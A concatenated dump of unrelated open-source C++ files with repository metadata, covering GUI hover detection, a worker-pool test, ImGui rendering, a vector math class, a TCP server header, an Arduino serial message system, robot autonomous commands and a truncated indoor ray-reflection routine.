/* ============================================================================== This file is part of the JUCE library - "Jules' Utility Class Extensions" Copyright 2004-10 by Raw Material Software Ltd. ------------------------------------------------------------------------------ JUCE can be redistributed and/or modified under the terms of the GNU General Public License (Version 2), as published by the Free Software Foundation. A copy of the license is included in the JUCE distribution, or can be found online at www.gnu.org/licenses. JUCE is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. ------------------------------------------------------------------------------ To release a closed-source product which uses JUCE, commercial licenses are available: visit www.rawmaterialsoftware.com/juce for more information. ============================================================================== */ #include "../../../core/juce_StandardHeader.h" BEGIN_JUCE_NAMESPACE #include "../juce_Component.h" #include "juce_MouseHoverDetector.h" #include "juce_MouseEvent.h" //============================================================================== MouseHoverDetector::MouseHoverDetector (const int hoverTimeMillisecs_) : source (0), hoverTimeMillisecs (hoverTimeMillisecs_), hasJustHovered (false) { internalTimer.owner = this; } MouseHoverDetector::~MouseHoverDetector() { setHoverComponent (0); } void MouseHoverDetector::setHoverTimeMillisecs (const int newTimeInMillisecs) { hoverTimeMillisecs = newTimeInMillisecs; } void MouseHoverDetector::setHoverComponent (Component* const newSourceComponent) { if (source != newSourceComponent) { internalTimer.stopTimer(); hasJustHovered = false; if (source != 0) source->removeMouseListener (&internalTimer); source = newSourceComponent; if (newSourceComponent != 0) newSourceComponent->addMouseListener (&internalTimer, false); } } void MouseHoverDetector::hoverTimerCallback() { internalTimer.stopTimer(); if (source != 0) { const Point<int> pos (source->getMouseXYRelative()); if (source->reallyContains (pos, false)) { hasJustHovered = true; mouseHovered (pos.getX(), pos.getY()); } } } void MouseHoverDetector::checkJustHoveredCallback() { if (hasJustHovered) { hasJustHovered = false; mouseMovedAfterHover(); } } //============================================================================== void MouseHoverDetector::HoverDetectorInternal::timerCallback() { owner->hoverTimerCallback(); } void MouseHoverDetector::HoverDetectorInternal::mouseEnter (const MouseEvent&) { stopTimer(); owner->checkJustHoveredCallback(); } void MouseHoverDetector::HoverDetectorInternal::mouseExit (const MouseEvent&) { stopTimer(); owner->checkJustHoveredCallback(); } void MouseHoverDetector::HoverDetectorInternal::mouseDown (const MouseEvent&) { stopTimer(); owner->checkJustHoveredCallback(); } void MouseHoverDetector::HoverDetectorInternal::mouseUp (const MouseEvent&) { stopTimer(); owner->checkJustHoveredCallback(); } void MouseHoverDetector::HoverDetectorInternal::mouseMove (const MouseEvent& e) { if (lastX != e.x || lastY != e.y) // to avoid fake mouse-moves setting it off { lastX = e.x; lastY = e.y; if (owner->source != 0) startTimer (owner->hoverTimeMillisecs); owner->checkJustHoveredCallback(); } } void MouseHoverDetector::HoverDetectorInternal::mouseWheelMove (const MouseEvent&, float, float) { stopTimer(); owner->checkJustHoveredCallback(); } END_JUCE_NAMESPACE
bfa7b26bba9e3b6b9fa6ab7d23e66fbe30553eb2
017c81ee14c457c529250059138d34f06158a131
/test/worker-pool-test.cc
dcf85c3bfef62418aaa78ca880faef5e09f4c748
[ "MIT" ]
permissive
mouton0815/word-counter-cpp
2205ff2d12e90f5f752a8512cc5def27262b0bbd
9b5d4800b7a865d7584aae5ebeee601639eaab7f
refs/heads/master
2020-09-10T17:27:37.361704
2019-11-23T17:50:54
2019-11-23T17:50:54
221,778,356
0
0
null
null
null
null
UTF-8
C++
false
false
1,195
cc
#include <algorithm> // std::sort #include <cassert> #include <iomanip> #include <iostream> #include <sstream> #include <string> #include <vector> #include "../src/constants.hh" #include "../src/path-queue.hh" #include "../src/worker-pool.hh" #include "file-reader-mock.hh" #include "tests.hh" std::string toPath(const int i) { std::stringstream s; s << std::setw(2) << std::setfill('0') << i; return Path(s.str()); } void runWorkerPoolAndVerify(const int pathCount) { PathQueue pathQueue; std::vector<Path> refList; for (int i = 0; i < pathCount; i++) { const auto path = toPath(i); refList.push_back(path); pathQueue.push(path); } pathQueue.push(STREAM_END); FileReaderMock fileReader; WorkerPool(4, pathQueue, fileReader)(); auto list = fileReader.get(); std::sort(list.begin(), list.end()); assert(std::equal(list.begin(), list.end(), refList.begin(), refList.end())); } void testWorkerPoolNoInput() { runWorkerPoolAndVerify(0); std::cout << "ok " << __FUNCTION__ << std::endl; } void testWorkerPoolWithInput() { runWorkerPoolAndVerify(100); std::cout << "ok " << __FUNCTION__ << std::endl; }
e29ab2559e0e06021ec21d9f1a18320e38dd5466
22212b6400346c5ec3f5927703ad912566d3474f
/src/Plugins/ImGUIPlugin/ImGUIRenderProvider.cpp
253e57f94babcbfd7e9693c9191a358ec2beb6a6
[ "LicenseRef-scancode-unknown-license-reference", "MIT" ]
permissive
irov/Mengine
673a9f35ab10ac93d42301bc34514a852c0f150d
8118e4a4a066ffba82bda1f668c1e7a528b6b717
refs/heads/master
2023-09-04T03:19:23.686213
2023-09-03T16:05:24
2023-09-03T16:05:24
41,422,567
46
17
MIT
2022-09-26T18:41:33
2015-08-26T11:44:35
C++
UTF-8
C++
false
false
3,263
cpp
#include "ImGUIRenderProvider.h" #include "Interface/RenderMaterialServiceInterface.h" #if defined(MENGINE_ENVIRONMENT_PLATFORM_SDL) #include "Interface/PlatformServiceInterface.h" #include "Interface/SDLPlatformServiceExtensionInterface.h" #endif #if defined(MENGINE_ENVIRONMENT_RENDER_DIRECTX9) #include "Interface/DX9RenderImageExtensionInterface.h" #endif #if defined(MENGINE_ENVIRONMENT_RENDER_OPENGL) #include "Interface/OpenGLRenderImageExtensionInterface.h" #endif #include "Config/UInt32ToPointer.h" #include "imgui.h" #if defined(MENGINE_ENVIRONMENT_PLATFORM_WIN32) #include "imgui_impl_win32.h" #endif #if defined(MENGINE_ENVIRONMENT_PLATFORM_SDL) #include "imgui_impl_sdl2.h" #endif #if defined(MENGINE_ENVIRONMENT_RENDER_DIRECTX9) #include "imgui_impl_dx9.h" #endif #if defined(MENGINE_ENVIRONMENT_RENDER_OPENGL) #include "imgui_impl_opengl2.h" #endif namespace Mengine { ////////////////////////////////////////////////////////////////////////// ImGUIRenderProvider::ImGUIRenderProvider() { } ////////////////////////////////////////////////////////////////////////// ImGUIRenderProvider::~ImGUIRenderProvider() { } ////////////////////////////////////////////////////////////////////////// ImTextureID ImGUIRenderProvider::getImTexture( const RenderTextureInterfacePtr & _texture ) const { const RenderImageInterfacePtr & image = _texture->getImage(); #if defined(MENGINE_ENVIRONMENT_RENDER_DIRECTX9) DX9RenderImageExtensionInterface * extension = image->getUnknown(); IDirect3DTexture9 * pD3DTexture = extension->getD3DTexture(); return (ImTextureID)pD3DTexture; #elif defined(MENGINE_ENVIRONMENT_RENDER_OPENGL) OpenGLRenderImageExtensionInterface * extension = image->getUnknown(); GLuint UID = extension->getUID(); return MENGINE_UINT32_TO_POINTER( ImTextureID, UID ); #else MENGINE_UNUSED( image ); return (ImTextureID)nullptr; #endif } ////////////////////////////////////////////////////////////////////////// void ImGUIRenderProvider::newFrame() { #if defined(MENGINE_ENVIRONMENT_RENDER_DIRECTX9) ImGui_ImplDX9_NewFrame(); #endif #if defined(MENGINE_ENVIRONMENT_RENDER_OPENGL) ImGui_ImplOpenGL2_NewFrame(); #endif #if defined(MENGINE_ENVIRONMENT_PLATFORM_WIN32) ImGui_ImplWin32_NewFrame(); #endif #if defined(MENGINE_ENVIRONMENT_PLATFORM_SDL) SDLPlatformServiceExtensionInterface * sdlPlatform = PLATFORM_SERVICE() ->getDynamicUnknown(); SDL_Window * window = sdlPlatform->getWindow(); ImGui_ImplSDL2_NewFrame( window ); #endif ImGui::NewFrame(); } ////////////////////////////////////////////////////////////////////////// void ImGUIRenderProvider::endFrame() { ImGui::EndFrame(); ImGui::Render(); ImDrawData * imData = ImGui::GetDrawData(); MENGINE_UNUSED( imData ); #if defined(MENGINE_ENVIRONMENT_RENDER_DIRECTX9) ImGui_ImplDX9_RenderDrawData( imData ); #endif #if defined(MENGINE_ENVIRONMENT_RENDER_OPENGL) ImGui_ImplOpenGL2_RenderDrawData( imData ); #endif } ////////////////////////////////////////////////////////////////////////// }
15120d94e2da97a883addd1355c03b2096597a13
09d2becb6e5211fa13f00cb7c87cf4c12791d2f2
/classes/classes/vetor.cpp
3607f2d58f828e5f68530e75e92f82dd0f79dc4b
[]
no_license
heloyza19/classesmatrizes
389cec06032f751be93dde49aa0f2a97b0a6c053
aceff24788ef060b9aa4147b5f4eabda55b04716
refs/heads/master
2020-04-30T00:42:27.768759
2019-03-19T14:27:21
2019-03-19T14:27:21
176,509,008
0
0
null
null
null
null
UTF-8
C++
false
false
2,253
cpp
#include "pch.h" #include "vetor.h" #include <iostream> using namespace std; vetor::vetor(int t) { size = t; double *V = new double(t); } vetor::~vetor() { delete[]V; } void vetor::print() { cout << "=["; for (int i = 0; i < size; i++) { cout << *(V + i) << " "; } cout << "]\n"; } void vetor::setV(double* A) { V = A; } double* vetor::getV() { return V; } //Sobrecarga do igual void vetor::operator =(const vetor &A) //const { this->size = A.size; double* vetor1 = new double[A.size]; for (int i = 0; i < A.size; i++) { *(vetor1 + i) = *(A.V + i); } this->setV(vetor1); } //Sobrecarga do igual //Construtor de c�pia- //Por que usar o const na sobrecarga do operador //Construtor de copia vetor::vetor(const vetor &A) { this->size = A.size; double* c = new double[A.size]; for (int i = 0; i < A.size; i++) { *(c + i) = A.V[i]; } this->setV(c); } vetor vetor::operator + (vetor &A) { if (A.size == this->size) { vetor C(A.size); double* c = new double[A.size]; for (int i = 0; i < A.size; i++) { *(c + i) = this->V[i] + A.V[i]; } C.setV(c); return C; } else { cerr << "vetores com tamanhos diferentes\n"; } } vetor vetor::operator - (vetor &A) { if (A.size == this->size) { vetor C(A.size); double* c = new double[A.size]; for (int i = 0; i < A.size; i++) { *(c + i) = this->V[i] - A.V[i]; } C.setV(c); return C; } else { cerr << "vetores com tamanhos diferentes\n"; } } double vetor::operator *(vetor &B) { if (this->size == B.size) { double p = 0; for (int i = 0; i < B.size; i++) { p += this->V[i] * B.V[i]; } return p; } else { cerr << "Vetores com tamanhos diferentes\n"; } } vetor vetor::cross(vetor &B) { if (this->size == B.size & B.size == 3) { vetor C(3); double*c = new double[3]; c[0] = (this->V[1] * B.V[2]) - (this->V[2] * B.V[1]); c[1] = (this->V[2] * B.V[0]) - (this->V[0] * B.V[2]); c[2] = (this->V[0] * B.V[1]) - (this->V[1] * B.V[0]); C.setV(c); return C; } else { cerr << "Erro\n"; } } vetor vetor::operator *(double n) { vetor C(this->size); double* c = new double[this->size]; for (int i = 0; i < this->size; i++) { c[i] = n * this->V[i]; } C.setV(c); return C; }
1b25782e918cc85dd58abfe7e556cbc25a5303ec
af65550ef3b61d45fa8b7d01de1087c7c4d9bf84
/test_2/segfault.cpp
fe5f92590eafa1563ac28852a755c451a7249e0c
[]
no_license
LouisJustinTALLOT/CPP
84f66ca66717af8ddb1bd70b7b692a5094536636
81e72a6961ab4882b3a9e030690f09b835b97237
refs/heads/master
2023-04-27T01:42:08.665313
2021-05-13T20:18:36
2021-05-13T20:18:36
305,413,328
0
0
null
null
null
null
UTF-8
C++
false
false
387
cpp
#include<iostream> void print (int) { std::cout << "print (int)\n"; } void print (char) { std::cout << "print (char)\n"; } void print (const char*) { std::cout << "print (const char*)\n"; } int* foo () { int j = 17; return &j; // stack 2 } int main () { int* pi = nullptr; // stack 1 pi = foo(); // stack 3 int k = *pi; // stack 4 return 0; }
fb9d5118af1f9d5481e2dd867ea95251a56278bd
d53227cf082f6381ed4149bde7a1cd598a89b6d9
/server/include/tcp_server.hpp
2d50c09b2d24ed4b41ef3c65fefe24ba36b599ba
[]
no_license
rdumitriu/geryon
7bf0abf87da4566d9852fba3091e35179cba2082
fa90e5c76222deeee4c0e19bc13cb4fa24ee9f4f
refs/heads/master
2021-01-01T06:49:32.124257
2015-04-06T19:50:08
2015-04-06T19:50:08
17,529,108
0
0
null
2014-10-07T22:44:02
2014-03-07T22:16:45
C++
UTF-8
C++
false
false
1,615
hpp
/** * \file tcp_server.hpp * * Created on: Aug 13, 2011 * Author: rdumitriu */ #ifndef GERYON_TCPSERVER_H_ #define GERYON_TCPSERVER_H_ #include <string> #include <boost/asio.hpp> #include "tcp_protocol.hpp" #include "tcp_connection_manager.hpp" namespace geryon { namespace server { /// The pure TCP server class TCPServer { public: TCPServer(const std::string & _srvName, const std::string & _bindAddress, const std::string & _bindPort, TCPProtocol & _proto); /// Destructor virtual ~TCPServer(); ///Non-copyable TCPServer (const TCPServer & copy) = delete; ///Non-copyable TCPServer & operator = (const TCPServer & other) = delete; ///\brief The run loop. You must invoke this for the magic to begin virtual void run () = 0; ///\brief Stops brutally the server void stop(); inline TCPProtocol & protocol() { return proto; } protected: virtual TCPConnectionManager & connectionManager() = 0; /// The io_service used to perform asynchronous operations. boost::asio::io_service iosrvc; /// Acceptor used to listen for incoming connections. boost::asio::ip::tcp::acceptor acceptor; /// The signal_set is used to register for process termination notifications. boost::asio::signal_set ssignals; ///The next accepted connection socket boost::asio::ip::tcp::socket socket; std::string serverName; std::string bindAddress; std::string bindPort; TCPProtocol & proto; private: void accept(); void await_stop_signal(); }; } } /* namespace */ #endif /* TCPSERVER_H_ */
bed634b064e8baa72b4837f674fb6d00219b6e83
33b19bcd0e2999ac5ee8a6ebb0ac09e52070bc9f
/codes/PE079.cpp
5d6cf03b711db283a9e69f68ed98b0c0b46a1a08
[]
no_license
ahmadyulian/project_euler
eac756119a03dca96d654a0815dbbe8c2766c4d4
d91b3f84857c5befdd6607891a0d81adb3657fe7
refs/heads/master
2023-05-07T16:47:19.083573
2021-06-01T11:07:00
2021-06-01T11:07:00
null
0
0
null
null
null
null
UTF-8
C++
false
false
1,216
cpp
#include <cmath> #include <cstdio> #include <vector> #include <iostream> #include <algorithm> #include <functional> #include <queue> #include <string> using namespace std; const int N = 1 << 8; vector <int> c; int deg[N]; vector <int> edge[N]; int main() { int t; scanf ("%d", &t); while (t--) { char login[5]; scanf ("%s", login); for (int i=0; i<3; i++) c.push_back(login[i]); for (int i=1; i<3; i++) { edge[login[i-1]].push_back(login[i]); deg[login[i]]++; } } sort (c.begin(), c.end()); c.resize(unique(c.begin(), c.end()) - c.begin()); priority_queue <int, vector<int>, greater<int> > pq; string ans; for (int i=0; i<c.size(); i++) { if (deg[c[i]] == 0) pq.push(c[i]); } while (pq.size()) { int now = pq.top(); pq.pop(); ans += now; for (int i=0; i<edge[now].size(); i++) { int v = edge[now][i]; deg[v]--; if (deg[v] == 0) pq.push(v); } } if (ans.size() != c.size()) printf ("SMTH WRONG\n"); else cout << ans << endl; return 0; }
61efc642ddb9331b11dd7df3a3a1b579ea27f72c
d939ea588d1b215261b92013e050993b21651f9a
/ie/src/v20200304/model/ColorEnhance.cpp
e7cd78819a2538c404d38a0be7a9c80d440e629f
[ "Apache-2.0" ]
permissive
chenxx98/tencentcloud-sdk-cpp
374e6d1349f8992893ded7aa08f911dd281f1bda
a9e75d321d96504bc3437300d26e371f5f4580a0
refs/heads/master
2023-03-27T05:35:50.158432
2021-03-26T05:18:10
2021-03-26T05:18:10
null
0
0
null
null
null
null
UTF-8
C++
false
false
1,966
cpp
/* * Copyright (c) 2017-2019 THL A29 Limited, a Tencent company. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <tencentcloud/ie/v20200304/model/ColorEnhance.h> using TencentCloud::CoreInternalOutcome; using namespace TencentCloud::Ie::V20200304::Model; using namespace rapidjson; using namespace std; ColorEnhance::ColorEnhance() : m_typeHasBeenSet(false) { } CoreInternalOutcome ColorEnhance::Deserialize(const Value &value) { string requestId = ""; if (value.HasMember("Type") && !value["Type"].IsNull()) { if (!value["Type"].IsString()) { return CoreInternalOutcome(Error("response `ColorEnhance.Type` IsString=false incorrectly").SetRequestId(requestId)); } m_type = string(value["Type"].GetString()); m_typeHasBeenSet = true; } return CoreInternalOutcome(true); } void ColorEnhance::ToJsonObject(Value &value, Document::AllocatorType& allocator) const { if (m_typeHasBeenSet) { Value iKey(kStringType); string key = "Type"; iKey.SetString(key.c_str(), allocator); value.AddMember(iKey, Value(m_type.c_str(), allocator).Move(), allocator); } } string ColorEnhance::GetType() const { return m_type; } void ColorEnhance::SetType(const string& _type) { m_type = _type; m_typeHasBeenSet = true; } bool ColorEnhance::TypeHasBeenSet() const { return m_typeHasBeenSet; }
1eb0dbdc5dba1773c4ed44b0cce153655cf09ea2
38763072c8df0b176ed246604281e19c10c68c90
/source/h/ansiwideconverter_generic.h
187b003c25437a1f79514499cbae5b2ff30f7c68
[ "Apache-2.0" ]
permissive
Dcreeron/twain_library_source
c09f051ab47231baf187b87a6a139bb1449bf371
36d05d704f818ec3e06cbe7dd2db548187424489
refs/heads/main
2023-02-25T09:57:11.252961
2021-02-03T02:56:30
2021-02-03T02:56:30
334,765,670
0
0
Apache-2.0
2021-01-31T21:58:35
2021-01-31T21:58:35
null
UTF-8
C++
false
false
1,537
h
/* This file is part of the Dynarithmic TWAIN Library (DTWAIN). Copyright (c) 2002-2021 Dynarithmic Software. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. FOR ANY PART OF THE COVERED WORK IN WHICH THE COPYRIGHT IS OWNED BY DYNARITHMIC SOFTWARE. DYNARITHMIC SOFTWARE DISCLAIMS THE WARRANTY OF NON INFRINGEMENT OF THIRD PARTY RIGHTS. */ class ConvertW2A { CTL_String m_sz; public: ConvertW2A(LPCWSTR psz) { Init(psz); } operator LPCSTR() const { return(m_sz.c_str()); } private: void Init(LPCWSTR psz) { if (!psz) return; m_sz = std::move(CTL_String(psz, psz + wcslen(psz))); } }; class ConvertA2W { CTL_WString m_sz; public: ConvertA2W(LPCSTR psz) { Init(psz); } operator LPCWSTR() const { return(m_sz.c_str()); } private: void Init(LPCSTR psz) { if (!psz) return; m_sz = std::move(CTL_WString(psz, psz + strlen(psz))); } };
88b48097a2a3eda176aaabf05f0322ee64853ad4
306cf0e8402db1aef506cac96b5bdb39822ab97f
/src/envoy/utils/session_manager_test.cc
7a5f1f635a463789134e9f1ba913c05d52815ca9
[ "Apache-2.0" ]
permissive
dmadams/proxy
ce97bdbf93fa64b471710acb7e8063d06c4bac29
410b69ebf8a17a663b636225a5bcaa1740170dfd
refs/heads/master
2020-03-27T23:56:09.007106
2018-09-04T21:08:25
2018-09-04T21:08:25
146,910,254
0
0
Apache-2.0
2018-08-31T15:58:30
2018-08-31T15:29:43
C++
UTF-8
C++
false
false
1,170
cc
#include "session_manager.h" #include "src/envoy/utils/config.pb.h" #include "gmock/gmock.h" namespace Envoy { namespace Utils { class SessionManagerTest : public testing::Test { public: SessionManagerTest() { static const SessionManager::key_t key_ = {0}; sessionManagerImplPtr_.reset( new SessionManagerImpl(key_)); } typedef std::unique_ptr<SessionManagerImpl> SessionManagerImplPtr; SessionManagerImplPtr sessionManagerImplPtr_; }; TEST_F(SessionManagerTest, TestConstructorWithConfig) { static const std::string key = "pkb8+yUNwrVoYGaAwU9p/h6Mz0ryYwKoG1Irma6q8UY="; Utils::Config::SessionManagerConfig config; config.set_key(key); SessionManagerImpl manager(config); } TEST_F(SessionManagerTest, TestTokens) { auto token1 = sessionManagerImplPtr_->createXsrfToken("something"); EXPECT_EQ(44, token1.size()); // base64 encoded 32-byte digest EXPECT_EQ(true, sessionManagerImplPtr_->verifyToken("something", token1)); EXPECT_EQ(false, sessionManagerImplPtr_->verifyToken("somethingelse", token1)); } } // namespace Utils } // namespace Envoy
2033b8ad4149e638aa4b4925837327177eef9817
163b9252024b752bf6766c3e2736af6727f82802
/RobotCodeNew2/libraries/SimpleMessageSystem/SimpleMessageSystem.cpp
06a24f58e90b81d7fdee82c21df90c941f2f6ea2
[]
no_license
AuburnSPaRC/secon2012
15420d11b27bb63568f24ec343636b11470733ee
145ee2e993ce28ab1cd6f934b15b3df852cb98c5
refs/heads/master
2021-01-10T19:54:40.035070
2012-03-19T00:41:32
2012-03-19T00:41:32
3,213,695
0
1
null
null
null
null
UTF-8
C++
false
false
2,268
cpp
/* See SimpleMessageSystem.h for more information. */ // the size of the incomming message buffer (Arduino 0004 has a serial in buffer of 64 bytes) #define MESSAGE_BUFFER_SIZE 64 #define MESSAGE_BUFFER_LAST_ELEMENT 63 //ADDED FOR COMPATIBILITY WITH WIRING extern "C" { #include <stdlib.h> } //ADDED END // #include "WProgram.h" //Commented out for Arduino 1.0 #include "Arduino.h" #include "HardwareSerial.h" //ADDED FOR COMPATIBILITY WITH WIRING #include "SimpleMessageSystem.h" // local variables char messageState = 0; char messageBufferSerialByte; int messageBufferIndex = 0; char messageBuffer[MESSAGE_BUFFER_SIZE]; char *messageBufferLast; char *messageBufferWord; char messageSendState = 0; // local function prototype char messageNext(); void messageSpacer(); // INPUT MESSAGES CODE int messageGetInt() { if (messageNext()) return atoi(messageBufferWord); return 0; } char messageNext() { char * temppointer= NULL; switch (messageState) { case 0: return 0; case 1: temppointer = messageBuffer; messageState = 2; default: messageBufferWord = strtok_r(temppointer," ",&messageBufferLast); if (messageBufferWord != NULL) return 1; } return 0; } char messageGetChar() { if (messageNext()) return messageBufferWord[0]; return 0; } int messageBuild() { int size = 0; messageState = 0; while (Serial.available() > 0) { messageBufferSerialByte = Serial.read(); switch (messageBufferSerialByte) { case 10: break; case 13: size = messageBufferIndex; messageBuffer[messageBufferIndex]=0; messageBufferIndex=0; messageState = 1; break; default: messageBuffer[messageBufferIndex]=messageBufferSerialByte; messageBufferIndex = messageBufferIndex + 1; } if (messageBufferIndex >= MESSAGE_BUFFER_LAST_ELEMENT) messageBufferIndex=0; } return size; } // OUTPUT MESSAGES CODE void messageSendChar(char value) { messageSpacer(); Serial.print(value); } void messageSendInt(int value) { messageSpacer(); Serial.print(value); } void messageEnd() { messageSendState = 0; Serial.println(); } void messageSpacer() { if (messageSendState==1) Serial.print((char) 32); messageSendState = 1; }
6261e7e9c203fe52959c4057bf4a2333e8327852
3fef0b8f0cedb0372e1b054a20584a5824848f79
/2015/frc973/src/auto/commands/sauropodCommand.cpp
5a8626fe24a1e5f3ce881e5da2b322895af3afaf
[]
no_license
Team973/Old-Seasons
fce81966acf9746bf5b9348d15e67f398399181f
8e5ab5e9c50ff8df154673bbf893bcf39177be5b
refs/heads/master
2021-01-10T15:09:10.552517
2016-01-10T05:42:05
2016-01-10T05:42:05
49,354,620
2
0
null
null
null
null
UTF-8
C++
false
false
1,031
cpp
#include "WPILib.h" #include "sauropodCommand.hpp" #include "../../stateManager.hpp" namespace frc973 { SauropodCommand::SauropodCommand(StateManager *manager_, std::string preset_, float toteTimeout_, bool braked_, float timeout_, bool ignoreSensor_) { manager = manager_; preset = preset_; toteTimeout = toteTimeout_; braked = braked_; setTimeout(timeout_); ignoreSensor = ignoreSensor_; moving = false; } void SauropodCommand::init() { timer->Start(); timer->Reset(); } bool SauropodCommand::taskPeriodic() { if ((manager->gotTote() && !ignoreSensor) || timer->Get() > toteTimeout) { manager->setSauropodPreset(preset); moving = true; } if (moving) { if (manager->isSauropodDone() || timer->Get() > timeout) { if (braked && manager->isSauropodDone()) { manager->brakeClaw(); return true; } else if (!braked) { return true; } } } return false; } }
27663930a723d31ec48002c94322e6ba0bd9744e
59c47e1f8b2738fc2b824462e31c1c713b0bdcd7
/006-All_Test_Demo/006-TestEmbed/CanErrorTest/widget.cpp
f4ca298e393a863cbcfa33ac6f38dcf7ae9a3d60
[]
no_license
casterbn/Qt_project
8efcc46e75e2bbe03dc4aeaafeb9e175fb7b04ab
03115674eb3612e9dc65d4fd7bcbca9ba27f691c
refs/heads/master
2021-10-19T07:27:24.550519
2019-02-19T05:26:22
2019-02-19T05:26:22
null
0
0
null
null
null
null
UTF-8
C++
false
false
157
cpp
#include "widget.h" #include <QDebug> Widget::Widget(QWidget *parent) : QWidget(parent) { qDebug()<<__func__<<" is enter"; } Widget::~Widget() { }
9f46436c82ccb6208dc23a67b09bb33ce5ae31c0
4d47acb504f35622914adb999b3816240569a48c
/LAB/LAB4/passing_and_returning_obj_to_fun.cpp
5527e0f9ff033eb4a2e2badc9a45feae94c52517
[]
no_license
Safal-Marahatta/cpp_projects
bcd81cc54ecda5b2d2668b0bed93498af9d237a9
9d936fd9688a1ff78635744ca75f49a37b4e1853
refs/heads/main
2023-07-13T11:08:48.709015
2021-08-27T07:33:08
2021-08-27T07:33:08
366,620,007
0
0
null
null
null
null
UTF-8
C++
false
false
774
cpp
//WAP to add two complex numbers passing //object as an argument and returning resultant complex number #include<iostream> using namespace std; class complex1 { private: int real,imz; public: void input() { cout<<"enter the real and imaginary part of complex no"<<endl; cin>>real>>imz; } complex1 addcomplex(complex1 c1,complex1 c2) { complex1 temp; temp.real=c1.real+c2.real; temp.imz=c1.imz+c2.imz; return(temp); } void display() { cout<<"the summation is"<<endl<<real<<"+"<<"i"<<imz<<endl; } }; int main() { complex1 c1,c2,c3; c1.input(); c2.input(); c3=c3.addcomplex(c1,c2);//passing object as function argument c3.display(); return(0); }
04ee27c6b88a6b2dd3f01ea22d3575e55cf85aac
b5e459a3784d26b8a57d7cf9f2de9e9ccd47aeae
/in_pos_alg/in_pos_alg/total_reflection.cpp
032db3d63fab7adaf9e52405a2440b9066b8d595
[]
no_license
luxiangz/IndoorPositionAlgroithm_t
466a1b7f4e7f263ec5aff86c8ab6bd7ac03ccfa3
5d472ec0252459fc4902ca90151685aee9bd02db
refs/heads/master
2021-07-16T00:04:43.721598
2017-10-18T03:58:39
2017-10-18T03:58:39
104,991,557
0
0
null
null
null
null
GB18030
C++
false
false
22,463
cpp
#include <cmath> #include "total_reflection.h" #include <cstdlib> #define PI 3.14159265358979323846f float c = 3e8, Ant = 1.0, loss_factor = 1.0, t_tol = 1.0; /*--------------------------------------------------------------------------------------*/ void Mfct_Ref(int getdimensions, float **planes, float **TXpoint, float **RXpoint, int Nt, int Nr, int nplanes, int nr,float *rs_amp)//material//fc//flp_scale // (getdimensions, datatxt.planes, **basecoor_temp0, **meshgrid, basestationnum, nb_pts, row, nr) { float *TX = new float[getdimensions]; float *RX = new float[getdimensions]; float *TX_i = new float[getdimensions]; float *TX_j = new float[getdimensions]; float *TX_k = new float[getdimensions]; float *Phiti = new float[getdimensions]; float *Phitj = new float[getdimensions]; float *Phitij = new float[getdimensions]; float *Phitk = new float[getdimensions]; float *Phitjk = new float[getdimensions]; float *Phitijk = new float[getdimensions]; float *Phit_nt = new float[getdimensions]; //int Nr = nb_pts0*nb_pts0; int npath1, npath2, npath3, npath, currentpath, id, jd, kd, nb_pts, indice,ind,ld; int tflag0, tflag11, tflag12, tflag21, tflag22, tflag23, tflag31, tflag32, tflag33, tflag34; bool rflagi = false, rflagj = false, rflagij = false, rflagk = false, rflagjk = false, rflagijk = false; float *rpath1 = NULL, *rpath2 = NULL, *rpath3 = NULL; float *path0 = NULL, *path1 = NULL, *path2 = NULL, *path3 = NULL; float *Thits0 = NULL; float *Thits11 = NULL, *Thits12 = NULL; float *Thits21 = NULL, *Thits22 = NULL, *Thits23 = NULL; float *Thits31 = NULL, *Thits32 = NULL, *Thits33 = NULL, *Thits34 = NULL; float *distance_mfct, *lossfac_mfct; //xfloat *rs_amp; float temp; //output parament float **FlatDis = new float *[Nt]; for (int i = 0; i < Nt; i++) FlatDis[i] = new float[Nr]; //the outermost loop for (int r = 0; r < Nr; r++) { ld = r*Nt; for (int i = 0; i < getdimensions; i++) RX[i] = RXpoint[i][r]; //inner loop of the firing point for (int n = 0; n < Nt; n++) { for (int j = 0; j < getdimensions; j++) TX[j] = TXpoint[j][n]; npath1 = npath2 = npath3 = 0; currentpath = 0; if (nr > 0) { for (int cur_nplanes = 0; cur_nplanes < nplanes; cur_nplanes++) { fct_calimage(TX, planes, cur_nplanes, TX_i); rflagi = fct_calrpt(TX_i, RX, planes, cur_nplanes, Phiti); if (rflagi == true) { id = npath1 * 5; npath1++; rpath1 = (float *)realloc((float *)rpath1, (npath1)* 5 * sizeof(float)); //if(!rpath1){Error handing}//reallocate memory without changing the original allocation rpath1[0 + id] = Phiti[0]; rpath1[1 + id] = Phiti[1]; rpath1[2 + id] = Phiti[2];//交点坐标 rpath1[3 + id] = (float)cur_nplanes;//反射平面序号 rpath1[4 + id] = 1.0f; } if (nr > 1) { for (int nplanes_tempj = 0; nplanes_tempj < nplanes; nplanes_tempj++) { if (cur_nplanes != nplanes_tempj)//除去一次反射面,剩下所有面未发生反射的发生二次反射 { fct_calimage(TX_i, planes, nplanes_tempj, TX_j); rflagj = fct_calrpt(TX_j, RX, planes, nplanes_tempj, Phitj); if (rflagj == true) { rflagij = fct_calrpt(TX_i, Phitj, planes, cur_nplanes, Phitij); if (rflagij == true) { jd = npath2 * 10; npath2++; rpath2 = (float *)realloc((float *)rpath2, (npath2)* 10 * sizeof(float)); rpath2[0 + jd] = Phitij[0]; rpath2[1 + jd] = Phitij[1]; rpath2[2 + jd] = Phitij[2]; rpath2[3 + jd] = (float)cur_nplanes; rpath2[4 + jd] = 1.0f; rpath2[5 + jd] = Phitj[0]; rpath2[6 + jd] = Phitj[1]; rpath2[7 + jd] = Phitj[2]; rpath2[8 + jd] = (float)nplanes_tempj; rpath2[9 + jd] = 1.0f; } } if (nr > 2) { for (int nplanes_tempk = 0; nplanes_tempk < nplanes_tempk; 